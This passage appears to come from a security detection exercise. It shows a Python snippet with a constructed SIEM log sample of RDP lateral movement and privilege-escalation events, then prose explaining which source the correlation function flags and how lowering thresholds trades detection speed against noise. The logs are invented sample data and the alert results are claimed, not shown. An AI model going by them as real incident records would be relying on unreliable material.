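# Constructed sample: the exercise's alice.jones chain from 192.168.100.21, a
# help-desk admin (192.168.100.50) doing one routine RDP session, and a source
# (192.168.100.60) that escalates but only reaches a single host.
SAMPLE_SIEM = """\
Jan 17 10:00:02 siem1 src=192.168.100.21 dest=192.168.100.101 protocol=RDP event=unauthorised_privileged_access
Jan 17 10:05:45 siem1 src=192.168.100.21 dest=192.168.100.101 event=privilege_escalation_detected
Jan 17 10:06:32 siem1 src=192.168.100.21 dest=192.168.100.101 event=unauthorised_login_as_SYSTEM
Jan 17 10:12:10 siem1 src=192.168.100.50 dest=192.168.100.151 protocol=RDP event=lateral_movement_attempt
Jan 17 10:20:22 siem1 src=192.168.100.21 dest=192.168.100.201 protocol=RDP event=lateral_movement_attempt
Jan 17 10:30:12 siem1 src=192.168.100.21 dest=192.168.100.201 event=privilege_escalation_attempt
Jan 17 10:35:56 siem1 src=192.168.100.21 dest=192.168.100.151 protocol=RDP event=lateral_movement_attempt
Jan 17 10:40:00 siem1 src=192.168.100.60 dest=192.168.100.151 event=privilege_escalation_detected
Jan 17 10:41:30 siem1 src=192.168.100.60 dest=192.168.100.151 protocol=RDP event=lateral_movement_attempt
Jan 17 10:45:01 siem1 src=192.168.100.21 dest=8.8.8.8 protocol=DNS event=suspicious_dns_query
"""

if __name__ == "__main__":
    for alert in correlate_attack_chain(SAMPLE_SIEM.splitlines()):
        print(alert)
```

Only 192.168.100.21 alerts on the sample, as critical, with two lateral targets and the external lookup in its stage list; the routine RDP session from .50 has no escalation to anchor on, and .60 escalates but touches one host, so neither fires at the default threshold. Tuning min_targets down to 1 surfaces the .60 chain as high, which is the usual trade: earlier detection against more noise from legitimate administration.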
